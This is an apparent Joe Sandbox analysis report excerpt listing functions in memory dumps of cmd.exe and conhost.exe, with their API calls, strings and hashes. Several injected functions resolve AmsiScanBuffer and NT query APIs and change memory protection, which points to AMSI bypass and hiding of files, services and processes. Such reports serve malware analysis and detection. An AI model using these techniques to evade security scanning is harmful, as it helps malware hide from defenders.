Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: d0d46c7be976de51279b425babb847c39ef603170faee02bdd3b356c71b10852
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: D051D332312E00CBEB56CF15E888F6CB3D1E74AB99F558529DA4A477C8DB78E849C704

Function 000002527DEB9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000002527DEB9BA7

Strings

MOC, xrefs: 000002527DEB9B6F
RCC, xrefs: 000002527DEB9B77

Memory Dump Source

Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 71342968754ebf57a61dab2d01e03f6cf991385c9b331b3e52012ff4e0a91bdf
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 33617E32504BC4C2D762DF15E884B9AB7E0F78AB89F044215EB9807BD5CB78E198CB04

Function 000002527DEE25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002527DEE26C2
StrCpyW.SHLWAPI ref: 000002527DEE26D9

Strings

\\.\pipe\, xrefs: 000002527DEE26CD

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 37c4467977cc6b4475bef7d8872b73b7cd971d32df701a22d2d8131f23ebbb4b
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: BE510426204F91C3FA66CE36AC5C3AAE751F39FB82F540029DD5943BC9DA39C508C758

Function 000002527DF125DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002527DF126C2
StrCpyW.SHLWAPI ref: 000002527DF126D9

Strings

\\.\pipe\, xrefs: 000002527DF126CD

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 7f9780545fa006001d1a108c18ea2f17ce767833cc83a2264d3e95ab59ca16d1
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: BA51D426208F81C1EA24DE6ABC5D3ABE791F39E781F440225DD6943BC9DA3BC44CC749

Function 000002527DEF2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002527DEF2778
GetLastError.KERNEL32 ref: 000002527DEF279D

Strings

U, xrefs: 000002527DEF2722

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 090a2983caa9a3fed5f6ffcb7dca142642509c02c405c4c9caff4b5905eb5a2e
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 6C41D232625E80C7E751DF65E84879AF7A0F39E785F804121EA8D877D8EB38C509CB58

Function 000002527DF22660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002527DF22778
GetLastError.KERNEL32 ref: 000002527DF2279D

Strings

U, xrefs: 000002527DF22722

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 754eb42930d8fef745db3761803914ffea3cdb626823607fd65c5f0bf0d9ae64
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 3341C162625E84C6E720CF65EC0879EF7A0F35D785F840121EA5D877D8EB38D409CB85

Function 000002527DEE9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002527DEE91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000002527DEE87F7), ref: 000002527DEE9209

Strings

csm, xrefs: 000002527DEE91F6

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: f12e5941ba082bc6aa0553977c813c124fae4c6a059b74e1c0362ff9798fe760
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 08114932214F80C2EB62CB25F808249B7E1F78DB85F594220EA8D47BA8EF38C555CB04

Function 000002527DF19178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002527DF191C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000002527DF187F7), ref: 000002527DF19209

Strings

csm, xrefs: 000002527DF191F6

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 95718bb63fa5952e840400fd337c31440465f615210484942451a3ddddfa944f
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: AB111932214F8082EB21CB15E84835AB7E6F78DB95F584620EE9D07BE4DF39C595CB44

Function 000002527DEE1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002527DEE1D69
HeapAlloc.KERNEL32 ref: 000002527DEE1D77
GetProcessHeap.KERNEL32 ref: 000002527DEE1D9C
HeapFree.KERNEL32 ref: 000002527DEE1DAA

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 3464ca51347041b5d842149d6ffe7df07f244bdff1dc0c28ed20f46bb680b17b
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 57116D21A01F80C6EB56CB66E80825DA7A0F78EFD2F594164DE4E537E5EF38D5868304

Function 000002527DF11D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002527DF11D69
HeapAlloc.KERNEL32 ref: 000002527DF11D77
GetProcessHeap.KERNEL32 ref: 000002527DF11D9C
HeapFree.KERNEL32 ref: 000002527DF11DAA

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 9ec65b994061b47875f6bc3ce72489b00426ebda85f2fc47d6dbb9169a6c580d
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 5511A921A01F80D1EA14CB6AA80D25EB7A0FB8EFD1F584128DE5E577E4EF39D446C348

Function 000002527DEE1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002527DEE126A
HeapAlloc.KERNEL32 ref: 000002527DEE1279
GetProcessHeap.KERNEL32 ref: 000002527DEE1293
HeapAlloc.KERNEL32 ref: 000002527DEE12A4

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 3add5d132651e11d7ce62df7e53bc521d990cbf6c2688cbcbca9f1b1ec5d5601
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 40E03931601E04DBE755CB62DC08349BAE1EB9EB07F458024C909073D0EF7D969D8740

Function 000002527DF11264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002527DF1126A
HeapAlloc.KERNEL32 ref: 000002527DF11279
GetProcessHeap.KERNEL32 ref: 000002527DF11293
HeapAlloc.KERNEL32 ref: 000002527DF112A4

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: af70f53aa7b6a0a578156c31b53a320462ed1995c391e64304596711f9fe0b5f
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 6CE03931601A04EAF714CB62DC0D35AB6E1EB8DB16F448024C9190B390EF7D949D8781

Function 000002527DEE1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002527DEE1006
HeapAlloc.KERNEL32 ref: 000002527DEE1015
GetProcessHeap.KERNEL32 ref: 000002527DEE1028
HeapAlloc.KERNEL32 ref: 000002527DEE1037

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 4a192c851d1dcc14d2c53a85fc0a7f2611c1b6f5b2e1db6c36f06c96f027904e
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 9CE06D71611D04DBE759CB22DC08248B6A1FB9EB03F458020C909073D0EE38969C9610

Function 000002527DF11000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002527DF11006
HeapAlloc.KERNEL32 ref: 000002527DF11015
GetProcessHeap.KERNEL32 ref: 000002527DF11028
HeapAlloc.KERNEL32 ref: 000002527DF11037

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 10fa5def5376a68e355416d68e95cf1ba9ef89bc2c3820dee860d11e8c23b710
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: D2E0ED71611904EAF718DB62DC0D35EB6A1FB8DB16F448024C9190B390EE38949D9655

Analysis Process: conhost.exePID: 5964, Parent PID: 6068COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1402
Total number of Limit Nodes:	2

Executed Functions

Function 00000286D7D11E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000286D7D11E7F

Part of subcall function 00000286D7D122A8: GetModuleHandleA.KERNEL32(?,?,?,00000286D7D11EB1), ref: 00000286D7D122C0
Part of subcall function 00000286D7D122A8: GetProcAddress.KERNEL32(?,?,?,00000286D7D11EB1), ref: 00000286D7D122D1

CreateThread.KERNELBASE ref: 00000286D7D12043
TlsAlloc.KERNEL32 ref: 00000286D7D12049
TlsAlloc.KERNEL32 ref: 00000286D7D12055
TlsAlloc.KERNEL32 ref: 00000286D7D12061
TlsAlloc.KERNEL32 ref: 00000286D7D1206D
TlsAlloc.KERNEL32 ref: 00000286D7D12079
TlsAlloc.KERNEL32 ref: 00000286D7D12085

Strings

PdhGetRawCounterArrayW, xrefs: 00000286D7D11FD0
ntdll.dll, xrefs: 00000286D7D11E8D
amsi.dll, xrefs: 00000286D7D12019
advapi32.dll, xrefs: 00000286D7D11F57, 00000286D7D11F78
PdhGetFormattedCounterArrayW, xrefs: 00000286D7D11FF1
NtQuerySystemInformation, xrefs: 00000286D7D11EA5
NtDeviceIoControlFile, xrefs: 00000286D7D11FB6
NtQueryDirectoryFileEx, xrefs: 00000286D7D11EFC
EnumServiceGroupW, xrefs: 00000286D7D11F50
NtEnumerateKey, xrefs: 00000286D7D11F19
NtEnumerateValueKey, xrefs: 00000286D7D11F36
pdh.dll, xrefs: 00000286D7D11FD7, 00000286D7D11FF8
sechost.dll, xrefs: 00000286D7D11F99
EnumServicesStatusExW, xrefs: 00000286D7D11F71, 00000286D7D11F92
NtQueryDirectoryFile, xrefs: 00000286D7D11EDF
AmsiScanBuffer, xrefs: 00000286D7D12012
NtResumeThread, xrefs: 00000286D7D11EC2

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: aa93adcf77c80b2918b9fa9f83aacda109376ddc0562d94aefdd459ae859e877
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 4651BEAC312A4AA5FB20EFA4EC4D7D87320BB41358F84D513980D03579EE7A965BC393

Function 00000286D7D11E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000286D7D11E47
GetProcAddress.KERNEL32 ref: 00000286D7D11E57
SleepEx.KERNELBASE ref: 00000286D7D11E67

Strings

amsi.dll, xrefs: 00000286D7D11E40
AmsiScanBuffer, xrefs: 00000286D7D11E50

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 896a41bb0789da3724037027665fc1d475b96b3b61b5b1f5244e3eebdc4f9f26
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: E6D09E1CB13600D6FA296F51EC5D7643261BF64B15FC4D495C90F022B0EE2D895AD393

Function 00000286D7D13A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000286D7D13A35
PathFindFileNameW.SHLWAPI ref: 00000286D7D13A44

Part of subcall function 00000286D7D13F88: StrCmpNIW.SHLWAPI(?,?,?,00000286D7D1272F), ref: 00000286D7D13FA0

Part of subcall function 00000286D7D13EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13EDB
Part of subcall function 00000286D7D13EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13F0E
Part of subcall function 00000286D7D13EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13F2E
Part of subcall function 00000286D7D13EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13F47
Part of subcall function 00000286D7D13EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13F68

CreateThread.KERNELBASE ref: 00000286D7D13A8B

Part of subcall function 00000286D7D11E74: GetCurrentThread.KERNEL32 ref: 00000286D7D11E7F
Part of subcall function 00000286D7D11E74: CreateThread.KERNELBASE ref: 00000286D7D12043
Part of subcall function 00000286D7D11E74: TlsAlloc.KERNEL32 ref: 00000286D7D12049
Part of subcall function 00000286D7D11E74: TlsAlloc.KERNEL32 ref: 00000286D7D12055
Part of subcall function 00000286D7D11E74: TlsAlloc.KERNEL32 ref: 00000286D7D12061
Part of subcall function 00000286D7D11E74: TlsAlloc.KERNEL32 ref: 00000286D7D1206D
Part of subcall function 00000286D7D11E74: TlsAlloc.KERNEL32 ref: 00000286D7D12079
Part of subcall function 00000286D7D11E74: TlsAlloc.KERNEL32 ref: 00000286D7D12085

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: c454ded60ffb063be2df13a0e9b680caf0471c50318e62a599a30da06a64ca06
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 02117C3D712F4282FB70A720E64D7AD72A0B794359F50C1299C0A811D0EF7DC458C753

Function 00000286D7CE2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule
